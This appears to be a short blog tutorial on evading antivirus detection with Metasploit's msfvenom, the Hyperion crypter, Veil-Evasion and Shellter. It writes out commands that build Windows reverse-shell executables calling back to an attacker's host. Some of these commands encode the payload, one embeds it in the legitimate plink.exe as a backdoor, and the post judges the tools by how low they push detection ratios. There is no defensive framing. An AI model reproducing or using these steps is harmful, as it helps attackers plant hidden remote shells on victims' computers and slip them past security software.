Today I would like to present several methods of antivirus mechanisms evasion.
Within this article I will use couple tools such as: metasploit, shellter, veil-evasion.
Conclusion of the article will be comparison of efficiency generated payloads.
1. Metasploit Framework
- msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe
Let's try generate the same payload but with encoding
- msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
Now, let's try inject our malicious payload into other program.
- msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
- cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
cp /usr/share/windows-binaries/Hyperion-1.0.zip .
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
wine hyperion.exe ../backdoor.exe ../crypted.exe
Hmmm, still to high detection ratio.
2. Veil-evasion
Veil evasion is a very useful tool which is compatible with metasploit payloads.
Let's lists payloads
Good, let's use for example payload 35.
Quite nice! Detection ratio is lower than 50%.
3. Shellter
Shellter is the most effective tool to bypass AV detection. Shellter utilize no-malcious program such as putty.exe and incject malicious instruction.
We can use A (automation) mode. Next we have to set PE target - file which we will inject.
Great! For me detection ratio is very low, isn't it?
As we can see shellter is very effective tool to AV evasion.
